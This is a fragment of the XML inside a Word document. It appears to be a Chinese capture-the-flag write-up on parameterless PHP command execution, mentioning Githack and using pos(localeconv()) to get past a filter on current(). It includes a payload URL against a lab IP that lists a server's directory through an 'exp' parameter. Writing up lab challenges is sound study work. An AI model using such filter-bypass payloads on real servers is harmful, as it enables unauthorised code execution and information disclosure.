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Githack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="2581910"/>
            <wp:effectExtent l="0" t="0" r="381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php无参数执行命令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"/>
        </w:rPr>
        <w:t xml:space="preserve">current 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被过滤了，所以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current()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不能使用，但是存在一个别名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pos()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，所以可以用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pos(localeconv())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来生成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</w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="1889125"/>
            <wp:effectExtent l="0" t="0" r="571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"http://172.21.4.12:10031/?exp=print_r(scandir(pos(localeconv())));"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http://172.21.4.12:10031/?exp=print_r(scandir(pos(localeconv())));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69865" cy="1310005"/>
            <wp:effectExtent l="0" t="0" r="698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789430"/>
            <wp:effectExtent l="0" t="0" r="825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978025"/>
            <wp:effectExtent l="0" t="0" r="889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>Hardcode php</w:t>
      </w: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EF372B"/>
    <w:rsid w:val="BFEF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2019-12-23T22:11:00Z</dcterms:created>
  <dc:creator>樂行</dc:creator>
  <cp:lastModifiedBy>樂行</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-12-23T22:24:07Z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